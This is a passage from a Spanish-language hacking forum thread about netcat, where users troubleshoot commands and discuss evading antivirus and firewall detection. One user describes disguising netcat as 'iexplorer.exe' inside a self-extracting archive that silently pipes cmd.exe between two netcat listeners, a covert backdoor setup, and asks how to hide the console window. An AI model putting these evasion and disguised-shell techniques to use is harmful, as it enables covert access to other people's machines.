Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 4 Visitantes están viendo este tema.

ne0x

#50
Estaria wapo conseguir que no lo detectase...  :) :)

NewLog

#51
Para el firewall es hacer lo que ya se ha explicado. Una shell pipelada (como dicen xD).

Ahora me miro eso del método RIT!

De momento he encontrado algo útil! No se queda en modificar el código, el muy bestia te modifica el binario! Ole sus huevos!

http://packetstorm.linuxsecurity.com/papers/virus/Taking_Back_Netcat.pdf

gblaze

Tengo un problema con esto  " JUGANDO CON NETCAT V1.1
                Parte II"

este comando no me sale bien mira:

==================================

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

==================================

dice que "nc" no es un comando reconocido, aqui esta la imagen:






alguien me puede ayudar?? gracias!


ne0x

Si, yo me bajaria el Netcat y lo copiaria en una carpeta que este en el PATH.


Que es el PATH ?
Pues basicamente una variable que contiene las rutas en la que buscar archivos ejecutables, comandos, etc.. separadas por  " ; ".


Mi PATH: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\MinGW\bin

Mi recomendacion es que lo copies en %SystemDrive%\Windows\System32

Lo puedes bajar desde la pagina de http://www.elhacker.net, en la sección Hacking.

Te pongo ya el enlace: http://safariexamples.informit.com/0201719568/Misc/Netcat/NT/nc11nt.zip


Saludos !!

NewLog

No teniamos que irnos tan lejos para encontrar como hacer netcat indetectable:

http://foro.elhacker.net/index.php/topic,38580.0.html

o número 28 de la revista hackxcrack.

ChizzoColman

Hola que tal...saliendome del tema WHK me das tu e-mail a si me ayudas..Tengo varias preguntas


dasdas

buenas señoras, haciendo uso del metodo de ne0x estoy intentando crear el ejecutable con el winzip pero ... solo me ejecuta el primer comando, a ver si me explico, al poner:

Citariexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

en "ejecutar despues de extraer", solo me ejecuta el:

Citariexplorer -d 127.0.0.1 21

entonces.... creo recordar que en linux lo que hacia era crear un archivo adjunto donde poner los argumentos que en este caso seria:

Citar-d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

e invocarlo asi:

Citariexplorer.exe < archivoadjunto

pero no se si es fallo mio o que en la shell de win no se hace asi. alguna idea?

hepy_92

GrAcIaS!!!!!
weniiiisimo el manual, algo que he buscado desde hace tiempo
muy bien explicado y muy completo!!!
aver si te animas a hacer uno para poder transferir archivos :P

dasdas

ah! me olvidado decir que haciendo un .bat no me soluciona, ya que entonces si que funciona el invento pero se abre una ventana de shell con todo el comando.... y como que queda un poco feo =P